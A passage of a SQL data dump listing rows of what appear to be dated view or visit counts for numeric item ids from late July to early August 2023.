12:35:08'),(81426,4759,1,'2023-07-25','2023-07-25 12:39:45'),(81427,4238,1,'2023-07-25','2023-07-25 13:37:16'),(81428,4966,1,'2023-07-25','2023-07-25 14:54:47'),(81429,80,1,'2023-07-25','2023-07-25 15:30:30'),(81430,2704,1,'2023-07-25','2023-07-25 15:41:14'),(81431,1594,1,'2023-07-25','2023-07-25 16:13:07'),(81432,4457,1,'2023-07-25','2023-07-25 17:13:54'),(81433,4608,1,'2023-07-25','2023-07-25 18:08:55'),(81434,4977,1,'2023-07-25','2023-07-25 18:13:58'),(81435,5276,1,'2023-07-25','2023-07-25 18:49:20'),(81436,4648,1,'2023-07-25','2023-07-25 19:08:30'),(81437,1770,1,'2023-07-25','2023-07-25 19:39:09'),(81438,5276,1,'2023-07-25','2023-07-25 20:03:04'),(81439,482,1,'2023-07-25','2023-07-25 20:39:48'),(81440,4762,1,'2023-07-25','2023-07-25 21:47:14'),(81441,4911,1,'2023-07-25','2023-07-25 23:09:08'),(81442,1610,1,'2023-07-26','2023-07-26 01:00:47'),(81443,1610,1,'2023-07-26','2023-07-26 01:01:54'),(81444,1610,1,'2023-07-26','2023-07-26 01:02:09'),(81445,2904,1,'2023-07-26','2023-07-26 02:12:41'),(81446,4911,1,'2023-07-26','2023-07-26 02:12:43'),(81447,4608,1,'2023-07-26','2023-07-26 02:50:50'),(81448,4448,1,'2023-07-26','2023-07-26 03:09:29'),(81449,3781,1,'2023-07-26','2023-07-26 03:52:36'),(81450,5280,1,'2023-07-26','2023-07-26 04:10:28'),(81451,3752,1,'2023-07-26','2023-07-26 05:01:28'),(81452,2813,1,'2023-07-26','2023-07-26 05:47:30'),(81453,3735,1,'2023-07-26','2023-07-26 06:21:07'),(81454,2704,1,'2023-07-26','2023-07-26 08:21:51'),(81455,4608,1,'2023-07-26','2023-07-26 11:21:11'),(81456,1594,1,'2023-07-26','2023-07-26 11:39:49'),(81457,1612,1,'2023-07-26','2023-07-26 11:58:08'),(81458,4960,1,'2023-07-26','2023-07-26 13:32:28'),(81459,4960,1,'2023-07-26','2023-07-26 14:15:58'),(81460,4657,1,'2023-07-26','2023-07-26 14:42:06'),(81461,4657,1,'2023-07-26','2023-07-26 14:42:07'),(81462,2813,1,'2023-07-26','2023-07-26 14:56:45'),(81463,4648,1,'2023-07-26','2023-07-26 14:57:09'),(81464,2813,1,'2023-07-26','2023-07-26 14:57:32'),(81465,2813,1,'2023-07-26','2023-07-26 14:57:43'),(81466,2813,1,'2023-07-26','2023-07-26 15:00:10'),(81467,2813,1,'2023-07-26','2023-07-26 15:00:38'),(81468,5276,1,'2023-07-26','2023-07-26 15:09:01'),(81469,5276,1,'2023-07-26','2023-07-26 15:09:03'),(81470,4612,1,'2023-07-26','2023-07-26 16:00:49'),(81471,4966,1,'2023-07-26','2023-07-26 16:01:38'),(81472,3307,1,'2023-07-26','2023-07-26 16:06:49'),(81473,2309,1,'2023-07-26','2023-07-26 16:12:05'),(81474,4660,1,'2023-07-26','2023-07-26 16:39:02'),(81475,4660,1,'2023-07-26','2023-07-26 16:39:04'),(81476,4703,1,'2023-07-26','2023-07-26 17:37:14'),(81477,1745,1,'2023-07-26','2023-07-26 17:40:35'),(81478,467,1,'2023-07-26','2023-07-26 18:21:03'),(81479,1600,1,'2023-07-26','2023-07-26 18:28:24'),(81480,1602,1,'2023-07-26','2023-07-26 18:34:33'),(81481,4944,1,'2023-07-26','2023-07-26 20:03:53'),(81482,5353,1,'2023-07-26','2023-07-26 20:38:03'),(81483,5046,1,'2023-07-26','2023-07-26 21:11:26'),(81484,3724,1,'2023-07-26','2023-07-26 21:32:03'),(81485,4691,1,'2023-07-26','2023-07-26 21:57:03'),(81486,4648,1,'2023-07-26','2023-07-26 22:08:03'),(81487,4648,1,'2023-07-26','2023-07-26 22:08:05'),(81488,5356,1,'2023-07-26','2023-07-26 23:38:02'),(81489,5356,1,'2023-07-26','2023-07-26 23:38:04'),(81490,5058,1,'2023-07-26','2023-07-26 23:55:44'),(81491,4911,1,'2023-07-27','2023-07-27 00:06:28'),(81492,1608,1,'2023-07-27','2023-07-27 02:59:13'),(81493,68,1,'2023-07-27','2023-07-27 02:59:19'),(81494,80,1,'2023-07-27','2023-07-27 03:13:23'),(81495,3534,1,'2023-07-27','2023-07-27 04:06:48'),(81496,5058,1,'2023-07-27','2023-07-27 04:28:50'),(81497,4520,1,'2023-07-27','2023-07-27 04:29:13'),(81498,91,1,'2023-07-27','2023-07-27 04:29:31'),(81499,5058,1,'2023-07-27','2023-07-27 04:30:41'),(81500,5058,1,'2023-07-27','2023-07-27 04:31:45'),(81501,5058,1,'2023-07-27','2023-07-27 04:35:37'),(81502,4966,1,'2023-07-27','2023-07-27 04:45:04'),(81503,467,1,'2023-07-27','2023-07-27 04:51:43'),(81504,5163,1,'2023-07-27','2023-07-27 05:43:59'),(81505,2704,1,'2023-07-27','2023-07-27 06:01:05'),(81506,2704,1,'2023-07-27','2023-07-27 06:02:11'),(81507,4457,1,'2023-07-27','2023-07-27 06:40:25'),(81508,5163,1,'2023-07-27','2023-07-27 06:46:14'),(81509,76,1,'2023-07-27','2023-07-27 06:49:46'),(81510,108,1,'2023-07-27','2023-07-27 06:50:16'),(81511,91,1,'2023-07-27','2023-07-27 06:51:18'),(81512,5071,1,'2023-07-27','2023-07-27 06:52:19'),(81513,91,1,'2023-07-27','2023-07-27 06:57:17'),(81514,108,1,'2023-07-27','2023-07-27 06:57:19'),(81515,76,1,'2023-07-27','2023-07-27 06:58:48'),(81516,5163,1,'2023-07-27','2023-07-27 06:58:52'),(81517,1594,1,'2023-07-27','2023-07-27 07:29:25'),(81518,4524,1,'2023-07-27','2023-07-27 07:51:56'),(81519,5080,1,'2023-07-27','2023-07-27 08:21:59'),(81520,1604,1,'2023-07-27','2023-07-27 09:34:23'),(81521,87,1,'2023-07-27','2023-07-27 09:37:22'),(81522,4529,1,'2023-07-27','2023-07-27 09:40:20'),(81523,1614,1,'2023-07-27','2023-07-27 10:29:17'),(81524,76,1,'2023-07-27','2023-07-27 10:36:58'),(81525,1544,1,'2023-07-27','2023-07-27 11:29:58'),(81526,84,1,'2023-07-27','2023-07-27 12:22:23'),(81527,3004,1,'2023-07-27','2023-07-27 12:28:59'),(81528,2704,1,'2023-07-27','2023-07-27 12:41:33'),(81529,2704,1,'2023-07-27','2023-07-27 12:42:01'),(81530,2704,1,'2023-07-27','2023-07-27 12:42:26'),(81531,2704,1,'2023-07-27','2023-07-27 12:46:31'),(81532,2704,1,'2023-07-27','2023-07-27 12:48:00'),(81533,1588,1,'2023-07-27','2023-07-27 13:12:25'),(81534,3313,1,'2023-07-27','2023-07-27 14:05:37'),(81535,4747,1,'2023-07-27','2023-07-27 14:32:21'),(81536,76,1,'2023-07-27','2023-07-27 14:48:55'),(81537,76,1,'2023-07-27','2023-07-27 14:54:33'),(81538,1594,1,'2023-07-27','2023-07-27 16:02:46'),(81539,4332,1,'2023-07-27','2023-07-27 16:14:34'),(81540,68,1,'2023-07-27','2023-07-27 16:23:33'),(81541,4747,1,'2023-07-27','2023-07-27 17:21:28'),(81542,89,1,'2023-07-27','2023-07-27 17:51:33'),(81543,68,1,'2023-07-27','2023-07-27 18:08:26'),(81544,1586,1,'2023-07-27','2023-07-27 18:51:48'),(81545,4845,1,'2023-07-27','2023-07-27 19:00:32'),(81546,4911,1,'2023-07-27','2023-07-27 19:14:36'),(81547,5359,1,'2023-07-27','2023-07-27 19:54:19'),(81548,5359,1,'2023-07-27','2023-07-27 19:54:23'),(81549,1594,1,'2023-07-27','2023-07-27 19:58:19'),(81550,2297,1,'2023-07-27','2023-07-27 20:16:50'),(81551,3764,1,'2023-07-27','2023-07-27 23:17:06'),(81552,4842,1,'2023-07-28','2023-07-28 00:01:44'),(81553,5109,1,'2023-07-28','2023-07-28 01:55:46'),(81554,3724,1,'2023-07-28','2023-07-28 02:50:13'),(81555,3045,1,'2023-07-28','2023-07-28 04:11:32'),(81556,3090,1,'2023-07-28','2023-07-28 04:34:16'),(81557,3273,1,'2023-07-28','2023-07-28 04:50:14'),(81558,2419,1,'2023-07-28','2023-07-28 05:12:43'),(81559,5289,1,'2023-07-28','2023-07-28 05:37:18'),(81560,1582,1,'2023-07-28','2023-07-28 05:51:23'),(81561,1582,1,'2023-07-28','2023-07-28 06:05:19'),(81562,4412,1,'2023-07-28','2023-07-28 06:05:30'),(81563,1600,1,'2023-07-28','2023-07-28 06:31:08'),(81564,5113,1,'2023-07-28','2023-07-28 07:53:23'),(81565,3724,1,'2023-07-28','2023-07-28 08:14:48'),(81566,4551,1,'2023-07-28','2023-07-28 09:02:24'),(81567,2609,1,'2023-07-28','2023-07-28 09:56:36'),(81568,3092,1,'2023-07-28','2023-07-28 10:07:28'),(81569,3764,1,'2023-07-28','2023-07-28 11:45:03'),(81570,2165,1,'2023-07-28','2023-07-28 12:14:06'),(81571,4938,1,'2023-07-28','2023-07-28 12:18:52'),(81572,5304,1,'2023-07-28','2023-07-28 12:23:49'),(81573,4996,1,'2023-07-28','2023-07-28 12:26:22'),(81574,1604,1,'2023-07-28','2023-07-28 13:18:26'),(81575,1604,1,'2023-07-28','2023-07-28 13:20:36'),(81576,1604,1,'2023-07-28','2023-07-28 13:20:51'),(81577,89,1,'2023-07-28','2023-07-28 13:21:04'),(81578,1604,1,'2023-07-28','2023-07-28 13:21:34'),(81579,68,1,'2023-07-28','2023-07-28 13:21:45'),(81580,89,1,'2023-07-28','2023-07-28 13:21:50'),(81581,1604,1,'2023-07-28','2023-07-28 13:22:36'),(81582,1600,1,'2023-07-28','2023-07-28 13:35:29'),(81583,1718,1,'2023-07-28','2023-07-28 13:58:33'),(81584,3251,1,'2023-07-28','2023-07-28 14:34:37'),(81585,5304,1,'2023-07-28','2023-07-28 14:37:44'),(81586,4436,1,'2023-07-28','2023-07-28 15:13:51'),(81587,3430,1,'2023-07-28','2023-07-28 15:44:39'),(81588,72,1,'2023-07-28','2023-07-28 15:44:41'),(81589,4520,1,'2023-07-28','2023-07-28 15:47:32'),(81590,5163,1,'2023-07-28','2023-07-28 15:52:21'),(81591,487,1,'2023-07-28','2023-07-28 15:52:28'),(81592,1604,1,'2023-07-28','2023-07-28 16:01:23'),(81593,1610,1,'2023-07-28','2023-07-28 16:11:22'),(81594,5356,1,'2023-07-28','2023-07-28 16:22:20'),(81595,4657,1,'2023-07-28','2023-07-28 16:40:07'),(81596,4938,1,'2023-07-28','2023-07-28 16:46:08'),(81597,3092,1,'2023-07-28','2023-07-28 17:07:20'),(81598,4556,1,'2023-07-28','2023-07-28 17:22:21'),(81599,2809,1,'2023-07-28','2023-07-28 17:36:08'),(81600,72,1,'2023-07-28','2023-07-28 17:50:30'),(81601,2558,1,'2023-07-28','2023-07-28 17:56:37'),(81602,3764,1,'2023-07-28','2023-07-28 18:48:12'),(81603,72,1,'2023-07-28','2023-07-28 18:52:24'),(81604,469,1,'2023-07-28','2023-07-28 19:50:27'),(81605,4911,1,'2023-07-28','2023-07-28 20:06:26'),(81606,84,1,'2023-07-28','2023-07-28 20:06:46'),(81607,87,1,'2023-07-28','2023-07-28 20:07:10'),(81608,488,1,'2023-07-28','2023-07-28 20:07:33'),(81609,68,1,'2023-07-28','2023-07-28 20:07:49'),(81610,488,1,'2023-07-28','2023-07-28 20:08:04'),(81611,87,1,'2023-07-28','2023-07-28 20:08:04'),(81612,84,1,'2023-07-28','2023-07-28 20:08:07'),(81613,4911,1,'2023-07-28','2023-07-28 20:08:08'),(81614,4911,1,'2023-07-28','2023-07-28 20:25:55'),(81615,1774,1,'2023-07-28','2023-07-28 20:48:57'),(81616,1594,1,'2023-07-28','2023-07-28 20:53:41'),(81617,4911,1,'2023-07-28','2023-07-28 21:06:24'),(81618,4911,1,'2023-07-28','2023-07-28 21:07:03'),(81619,1544,1,'2023-07-28','2023-07-28 21:09:17'),(81620,5280,1,'2023-07-28','2023-07-28 22:25:57'),(81621,1766,1,'2023-07-28','2023-07-28 22:34:41'),(81622,2165,1,'2023-07-28','2023-07-28 22:43:09'),(81623,5116,1,'2023-07-28','2023-07-28 22:47:16'),(81624,3764,1,'2023-07-28','2023-07-28 22:55:59'),(81625,2617,1,'2023-07-28','2023-07-28 23:37:32'),(81626,3045,1,'2023-07-29','2023-07-29 01:14:45'),(81627,2420,1,'2023-07-29','2023-07-29 02:23:56'),(81628,3316,1,'2023-07-29','2023-07-29 02:57:21'),(81629,2309,1,'2023-07-29','2023-07-29 03:08:32'),(81630,1766,1,'2023-07-29','2023-07-29 03:33:32'),(81631,478,1,'2023-07-29','2023-07-29 03:40:31'),(81632,4709,1,'2023-07-29','2023-07-29 03:42:14'),(81633,1718,1,'2023-07-29','2023-07-29 03:54:06'),(81634,1606,1,'2023-07-29','2023-07-29 04:16:02'),(81635,5359,1,'2023-07-29','2023-07-29 04:27:41'),(81636,4657,1,'2023-07-29','2023-07-29 04:38:10'),(81637,2420,1,'2023-07-29','2023-07-29 04:57:51'),(81638,3694,1,'2023-07-29','2023-07-29 05:18:48'),(81639,4556,1,'2023-07-29','2023-07-29 07:31:55'),(81640,5330,1,'2023-07-29','2023-07-29 08:04:56'),(81641,5122,1,'2023-07-29','2023-07-29 08:12:52'),(81642,5122,1,'2023-07-29','2023-07-29 08:13:22'),(81643,2775,1,'2023-07-29','2023-07-29 08:44:43'),(81644,5280,1,'2023-07-29','2023-07-29 08:55:32'),(81645,3045,1,'2023-07-29','2023-07-29 10:09:45'),(81646,3764,1,'2023-07-29','2023-07-29 10:28:39'),(81647,1612,1,'2023-07-29','2023-07-29 12:47:51'),(81648,4966,1,'2023-07-29','2023-07-29 13:17:00'),(81649,4911,1,'2023-07-29','2023-07-29 13:45:35'),(81650,4911,1,'2023-07-29','2023-07-29 13:47:24'),(81651,1544,1,'2023-07-29','2023-07-29 14:39:39'),(81652,1612,1,'2023-07-29','2023-07-29 14:39:43'),(81653,4529,1,'2023-07-29','2023-07-29 14:54:39'),(81654,1594,1,'2023-07-29','2023-07-29 15:28:39'),(81655,1594,1,'2023-07-29','2023-07-29 15:28:39'),(81656,1594,1,'2023-07-29','2023-07-29 15:29:05'),(81657,1594,1,'2023-07-29','2023-07-29 15:30:05'),(81658,1544,1,'2023-07-29','2023-07-29 16:07:32'),(81659,4412,1,'2023-07-29','2023-07-29 16:11:03'),(81660,5153,1,'2023-07-29','2023-07-29 16:37:01'),(81661,5163,1,'2023-07-29','2023-07-29 17:32:25'),(81662,4709,1,'2023-07-29','2023-07-29 17:58:11'),(81663,4551,1,'2023-07-29','2023-07-29 18:56:19'),(81664,470,1,'2023-07-29','2023-07-29 19:16:44'),(81665,1602,1,'2023-07-29','2023-07-29 19:45:28'),(81666,2154,1,'2023-07-29','2023-07-29 20:02:55'),(81667,1588,1,'2023-07-29','2023-07-29 20:41:53'),(81668,5080,1,'2023-07-29','2023-07-29 20:58:12'),(81669,1728,1,'2023-07-29','2023-07-29 22:07:18'),(81670,2904,1,'2023-07-29','2023-07-29 22:16:57'),(81671,3004,1,'2023-07-29','2023-07-29 22:26:45'),(81672,3079,1,'2023-07-29','2023-07-29 22:55:44'),(81673,3290,1,'2023-07-29','2023-07-29 23:03:30'),(81674,91,1,'2023-07-29','2023-07-29 23:37:10'),(81675,4382,1,'2023-07-29','2023-07-29 23:44:00'),(81676,91,1,'2023-07-29','2023-07-29 23:45:09'),(81677,5330,1,'2023-07-29','2023-07-29 23:47:24'),(81678,4950,1,'2023-07-30','2023-07-30 01:20:08'),(81679,2769,1,'2023-07-30','2023-07-30 01:40:55'),(81680,2769,1,'2023-07-30','2023-07-30 01:52:09'),(81681,1612,1,'2023-07-30','2023-07-30 03:56:53'),(81682,1596,1,'2023-07-30','2023-07-30 05:30:52'),(81683,4520,1,'2023-07-30','2023-07-30 05:45:52'),(81684,1612,1,'2023-07-30','2023-07-30 06:01:22'),(81685,482,1,'2023-07-30','2023-07-30 06:06:30'),(81686,1596,1,'2023-07-30','2023-07-30 06:08:22'),(81687,4950,1,'2023-07-30','2023-07-30 07:31:33'),(81688,3290,1,'2023-07-30','2023-07-30 08:16:22'),(81689,3482,1,'2023-07-30','2023-07-30 09:38:53'),(81690,5163,1,'2023-07-30','2023-07-30 10:07:27'),(81691,3746,1,'2023-07-30','2023-07-30 10:08:15'),(81692,5163,1,'2023-07-30','2023-07-30 10:10:21'),(81693,5163,1,'2023-07-30','2023-07-30 10:11:09'),(81694,3746,1,'2023-07-30','2023-07-30 10:19:30'),(81695,3764,1,'2023-07-30','2023-07-30 10:41:51'),(81696,3691,1,'2023-07-30','2023-07-30 10:42:56'),(81697,5253,1,'2023-07-30','2023-07-30 11:08:56'),(81698,3691,1,'2023-07-30','2023-07-30 11:16:11'),(81699,89,1,'2023-07-30','2023-07-30 11:16:50'),(81700,1544,1,'2023-07-30','2023-07-30 11:19:28'),(81701,1544,1,'2023-07-30','2023-07-30 11:22:43'),(81702,89,1,'2023-07-30','2023-07-30 11:22:44'),(81703,470,1,'2023-07-30','2023-07-30 11:36:53'),(81704,5153,1,'2023-07-30','2023-07-30 11:53:56'),(81705,3313,1,'2023-07-30','2023-07-30 11:56:01'),(81706,3097,1,'2023-07-30','2023-07-30 12:24:05'),(81707,2457,1,'2023-07-30','2023-07-30 12:38:55'),(81708,1598,1,'2023-07-30','2023-07-30 13:02:14'),(81709,1608,1,'2023-07-30','2023-07-30 14:06:36'),(81710,4911,1,'2023-07-30','2023-07-30 14:54:45'),(81711,482,1,'2023-07-30','2023-07-30 14:55:48'),(81712,1728,1,'2023-07-30','2023-07-30 14:55:50'),(81713,3313,1,'2023-07-30','2023-07-30 15:17:15'),(81714,5071,1,'2023-07-30','2023-07-30 15:35:52'),(81715,2775,1,'2023-07-30','2023-07-30 15:48:16'),(81716,5109,1,'2023-07-30','2023-07-30 16:03:16'),(81717,1720,1,'2023-07-30','2023-07-30 16:12:17'),(81718,1728,1,'2023-07-30','2023-07-30 16:17:16'),(81719,4546,1,'2023-07-30','2023-07-30 16:18:16'),(81720,5280,1,'2023-07-30','2023-07-30 16:25:47'),(81721,4546,1,'2023-07-30','2023-07-30 16:33:15'),(81722,1594,1,'2023-07-30','2023-07-30 16:35:35'),(81723,80,1,'2023-07-30','2023-07-30 16:38:22'),(81724,4996,1,'2023-07-30','2023-07-30 16:40:18'),(81725,2769,1,'2023-07-30','2023-07-30 16:55:47'),(81726,4960,1,'2023-07-30','2023-07-30 19:42:02'),(81727,1544,1,'2023-07-30','2023-07-30 20:19:34'),(81728,4542,1,'2023-07-30','2023-07-30 20:20:00'),(81729,4762,1,'2023-07-30','2023-07-30 20:55:47'),(81730,80,1,'2023-07-30','2023-07-30 20:58:34'),(81731,1711,1,'2023-07-30','2023-07-30 23:47:41'),(81732,80,1,'2023-07-31','2023-07-31 03:02:56'),(81733,80,1,'2023-07-31','2023-07-31 03:13:36'),(81734,1602,1,'2023-07-31','2023-07-31 03:14:59'),(81735,4950,1,'2023-07-31','2023-07-31 03:20:36'),(81736,1602,1,'2023-07-31','2023-07-31 03:42:12'),(81737,3742,1,'2023-07-31','2023-07-31 04:56:03'),(81738,5271,1,'2023-07-31','2023-07-31 04:56:04'),(81739,3482,1,'2023-07-31','2023-07-31 04:56:05'),(81740,3498,1,'2023-07-31','2023-07-31 04:56:08'),(81741,4436,1,'2023-07-31','2023-07-31 06:59:57'),(81742,4341,1,'2023-07-31','2023-07-31 07:05:46'),(81743,1720,1,'2023-07-31','2023-07-31 07:22:31'),(81744,1726,1,'2023-07-31','2023-07-31 07:39:57'),(81745,1596,1,'2023-07-31','2023-07-31 07:44:37'),(81746,80,1,'2023-07-31','2023-07-31 07:56:01'),(81747,5280,1,'2023-07-31','2023-07-31 08:07:28'),(81748,1614,1,'2023-07-31','2023-07-31 08:07:59'),(81749,5163,1,'2023-07-31','2023-07-31 08:14:24'),(81750,3764,1,'2023-07-31','2023-07-31 09:23:03'),(81751,2609,1,'2023-07-31','2023-07-31 09:47:18'),(81752,3781,1,'2023-07-31','2023-07-31 09:57:28'),(81753,4238,1,'2023-07-31','2023-07-31 10:09:30'),(81754,80,1,'2023-07-31','2023-07-31 10:20:03'),(81755,84,1,'2023-07-31','2023-07-31 10:23:52'),(81756,76,1,'2023-07-31','2023-07-31 10:24:34'),(81757,68,1,'2023-07-31','2023-07-31 10:25:20'),(81758,76,1,'2023-07-31','2023-07-31 10:25:49'),(81759,84,1,'2023-07-31','2023-07-31 10:25:52'),(81760,4323,1,'2023-07-31','2023-07-31 10:27:05'),(81761,5253,1,'2023-07-31','2023-07-31 10:32:18'),(81762,5157,1,'2023-07-31','2023-07-31 10:44:42'),(81763,4706,1,'2023-07-31','2023-07-31 10:51:41'),(81764,5157,1,'2023-07-31','2023-07-31 10:57:26'),(81765,469,1,'2023-07-31','2023-07-31 11:23:21'),(81766,4753,1,'2023-07-31','2023-07-31 12:19:20'),(81767,4911,1,'2023-07-31','2023-07-31 13:23:33'),(81768,1741,1,'2023-07-31','2023-07-31 13:26:49'),(81769,4323,1,'2023-07-31','2023-07-31 14:22:36'),(81770,4960,1,'2023-07-31','2023-07-31 14:33:53'),(81771,4301,1,'2023-07-31','2023-07-31 14:45:05'),(81772,1590,1,'2023-07-31','2023-07-31 15:18:56'),(81773,4960,1,'2023-07-31','2023-07-31 15:19:11'),(81774,3023,1,'2023-07-31','2023-07-31 16:00:07'),(81775,3664,1,'2023-07-31','2023-07-31 16:03:55'),(81776,5037,1,'2023-07-31','2023-07-31 16:30:08'),(81777,4436,1,'2023-07-31','2023-07-31 16:49:01'),(81778,1770,1,'2023-07-31','2023-07-31 17:09:14'),(81779,473,1,'2023-07-31','2023-07-31 17:41:06'),(81780,487,1,'2023-07-31','2023-07-31 17:41:09'),(81781,3664,1,'2023-07-31','2023-07-31 18:10:26'),(81782,5320,1,'2023-07-31','2023-07-31 18:27:28'),(81783,4960,1,'2023-07-31','2023-07-31 19:38:49'),(81784,4420,1,'2023-07-31','2023-07-31 20:47:30'),(81785,3721,1,'2023-07-31','2023-07-31 21:26:43'),(81786,1711,1,'2023-07-31','2023-07-31 21:27:39'),(81787,1602,1,'2023-07-31','2023-07-31 21:29:30'),(81788,76,1,'2023-07-31','2023-07-31 21:32:25'),(81789,76,1,'2023-07-31','2023-07-31 21:33:39'),(81790,91,1,'2023-07-31','2023-07-31 21:34:01'),(81791,4870,1,'2023-07-31','2023-07-31 21:50:10'),(81792,91,1,'2023-07-31','2023-07-31 21:51:24'),(81793,4878,1,'2023-07-31','2023-07-31 22:02:15'),(81794,91,1,'2023-07-31','2023-07-31 22:03:52'),(81795,5146,1,'2023-07-31','2023-07-31 22:04:38'),(81796,5146,1,'2023-07-31','2023-07-31 22:04:40'),(81797,91,1,'2023-07-31','2023-07-31 22:05:31'),(81798,5248,1,'2023-07-31','2023-07-31 22:06:35'),(81799,5248,1,'2023-07-31','2023-07-31 22:06:37'),(81800,91,1,'2023-07-31','2023-07-31 22:07:23'),(81801,4893,1,'2023-07-31','2023-07-31 22:08:38'),(81802,91,1,'2023-07-31','2023-07-31 22:09:28'),(81803,4893,1,'2023-07-31','2023-07-31 22:09:38'),(81804,91,1,'2023-07-31','2023-07-31 22:09:42'),(81805,4883,1,'2023-07-31','2023-07-31 22:11:33'),(81806,91,1,'2023-07-31','2023-07-31 22:12:35'),(81807,4874,1,'2023-07-31','2023-07-31 22:13:37'),(81808,91,1,'2023-07-31','2023-07-31 22:14:35'),(81809,4612,1,'2023-07-31','2023-07-31 22:15:55'),(81810,91,1,'2023-07-31','2023-07-31 22:27:37'),(81811,4448,1,'2023-07-31','2023-07-31 22:28:02'),(81812,91,1,'2023-07-31','2023-07-31 22:28:51'),(81813,4412,1,'2023-07-31','2023-07-31 22:31:14'),(81814,91,1,'2023-07-31','2023-07-31 22:31:57'),(81815,469,1,'2023-07-31','2023-07-31 22:35:50'),(81816,3087,1,'2023-07-31','2023-07-31 22:36:05'),(81817,91,1,'2023-07-31','2023-07-31 22:36:46'),(81818,4654,1,'2023-07-31','2023-07-31 23:43:59'),(81819,4911,1,'2023-08-01','2023-08-01 01:22:19'),(81820,468,1,'2023-08-01','2023-08-01 01:41:55'),(81821,4612,1,'2023-08-01','2023-08-01 02:39:15'),(81822,4930,1,'2023-08-01','2023-08-01 02:45:56'),(81823,4382,1,'2023-08-01','2023-08-01 03:30:54'),(81824,5256,1,'2023-08-01','2023-08-01 04:41:55'),(81825,87,1,'2023-08-01','2023-08-01 04:46:44'),(81826,91,1,'2023-08-01','2023-08-01 04:48:04'),(81827,5295,1,'2023-08-01','2023-08-01 04:50:01'),(81828,5140,1,'2023-08-01','2023-08-01 04:50:18'),(81829,3006,1,'2023-08-01','2023-08-01 05:47:57'),(81830,3107,1,'2023-08-01','2023-08-01 05:48:05'),(81831,3764,1,'2023-08-01','2023-08-01 06:10:23'),(81832,1592,1,'2023-08-01','2023-08-01 07:18:03'),(81833,3764,1,'2023-08-01','2023-08-01 08:09:24'),(81834,5001,1,'2023-08-01','2023-08-01 10:22:37'),(81835,2609,1,'2023-08-01','2023-08-01 10:27:12'),(81836,1612,1,'2023-08-01','2023-08-01 10:28:45'),(81837,2704,1,'2023-08-01','2023-08-01 10:42:04'),(81838,2165,1,'2023-08-01','2023-08-01 11:07:53'),(81839,4960,1,'2023-08-01','2023-08-01 11:24:41'),(81840,5163,1,'2023-08-01','2023-08-01 11:31:41'),(81841,4911,1,'2023-08-01','2023-08-01 12:06:34'),(81842,1582,1,'2023-08-01','2023-08-01 12:07:02'),(81843,1582,1,'2023-08-01','2023-08-01 12:20:25'),(81844,4776,1,'2023-08-01','2023-08-01 12:35:26'),(81845,5264,1,'2023-08-01','2023-08-01 12:43:19'),(81846,5163,1,'2023-08-01','2023-08-01 12:59:53'),(81847,2704,1,'2023-08-01','2023-08-01 13:11:14'),(81848,570,1,'2023-08-01','2023-08-01 13:25:23'),(81849,4966,1,'2023-08-01','2023-08-01 14:05:54'),(81850,4694,1,'2023-08-01','2023-08-01 14:55:58'),(81851,5058,1,'2023-08-01','2023-08-01 15:10:59'),(81852,2609,1,'2023-08-01','2023-08-01 15:56:00'),(81853,2410,1,'2023-08-01','2023-08-01 16:05:08'),(81854,3290,1,'2023-08-01','2023-08-01 16:08:54'),(81855,4654,1,'2023-08-01','2023-08-01 16:10:19'),(81856,5307,1,'2023-08-01','2023-08-01 16:40:58'),(81857,5125,1,'2023-08-01','2023-08-01 16:44:14'),(81858,4874,1,'2023-08-01','2023-08-01 19:45:41'),(81859,1701,1,'2023-08-01','2023-08-01 20:41:08'),(81860,1602,1,'2023-08-01','2023-08-01 20:42:00'),(81861,335,1,'2023-08-01','2023-08-01 20:43:55'),(81862,4911,1,'2023-08-01','2023-08-01 21:42:47'),(81863,4400,1,'2023-08-01','2023-08-01 21:50:21'),(81864,5071,1,'2023-08-01','2023-08-01 23:23:54'),(81865,474,1,'2023-08-01','2023-08-01 23:39:12'),(81866,2309,1,'2023-08-02','2023-08-02 01:26:02'),(81867,1600,1,'2023-08-02','2023-08-02 01:32:14'),(81868,4759,1,'2023-08-02','2023-08-02 02:03:27'),(81869,4963,1,'2023-08-02','2023-08-02 02:20:02'),(81870,4688,1,'2023-08-02','2023-08-02 02:38:28'),(81871,5301,1,'2023-08-02','2023-08-02 02:53:30'),(81872,1612,1,'2023-08-02','2023-08-02 02:54:01'),(81873,68,1,'2023-08-02','2023-08-02 02:54:23'),(81874,80,1,'2023-08-02','2023-08-02 02:54:48'),(81875,80,1,'2023-08-02','2023-08-02 02:55:44'),(81876,68,1,'2023-08-02','2023-08-02 02:55:45'),(81877,1612,1,'2023-08-02','2023-08-02 02:55:47'),(81878,1586,1,'2023-08-02','2023-08-02 03:08:28'),(81879,74,1,'2023-08-02','2023-08-02 03:23:30'),(81880,1586,1,'2023-08-02','2023-08-02 03:38:27'),(81881,5163,1,'2023-08-02','2023-08-02 03:56:47'),(81882,5122,1,'2023-08-02','2023-08-02 05:45:16'),(81883,3691,1,'2023-08-02','2023-08-02 05:59:02'),(81884,4654,1,'2023-08-02','2023-08-02 06:22:45'),(81885,4911,1,'2023-08-02','2023-08-02 06:36:23'),(81886,4753,1,'2023-08-02','2023-08-02 08:13:35'),(81887,3313,1,'2023-08-02','2023-08-02 08:16:05'),(81888,5304,1,'2023-08-02','2023-08-02 08:23:45'),(81889,3764,1,'2023-08-02','2023-08-02 08:28:24'),(81890,4677,1,'2023-08-02','2023-08-02 09:46:35'),(81891,4681,1,'2023-08-02','2023-08-02 09:49:16'),(81892,4688,1,'2023-08-02','2023-08-02 09:49:18'),(81893,74,1,'2023-08-02','2023-08-02 10:42:12'),(81894,5323,1,'2023-08-02','2023-08-02 10:55:28'),(81895,68,1,'2023-08-02','2023-08-02 11:03:54'),(81896,91,1,'2023-08-02','2023-08-02 11:09:07'),(81897,91,1,'2023-08-02','2023-08-02 11:14:01'),(81898,3287,1,'2023-08-02','2023-08-02 11:17:02'),(81899,91,1,'2023-08-02','2023-08-02 11:18:57'),(81900,5050,1,'2023-08-02','2023-08-02 11:19:05'),(81901,5050,1,'2023-08-02','2023-08-02 11:19:07'),(81902,91,1,'2023-08-02','2023-08-02 11:19:12'),(81903,4911,1,'2023-08-02','2023-08-02 11:22:29'),(81904,4341,1,'2023-08-02','2023-08-02 12:11:47'),(81905,1608,1,'2023-08-02','2023-08-02 12:39:11'),(81906,1604,1,'2023-08-02','2023-08-02 14:11:12'),(81907,91,1,'2023-08-02','2023-08-02 14:12:10'),(81908,76,1,'2023-08-02','2023-08-02 14:14:39'),(81909,5050,1,'2023-08-02','2023-08-02 14:16:33'),(81910,89,1,'2023-08-02','2023-08-02 14:16:46'),(81911,89,1,'2023-08-02','2023-08-02 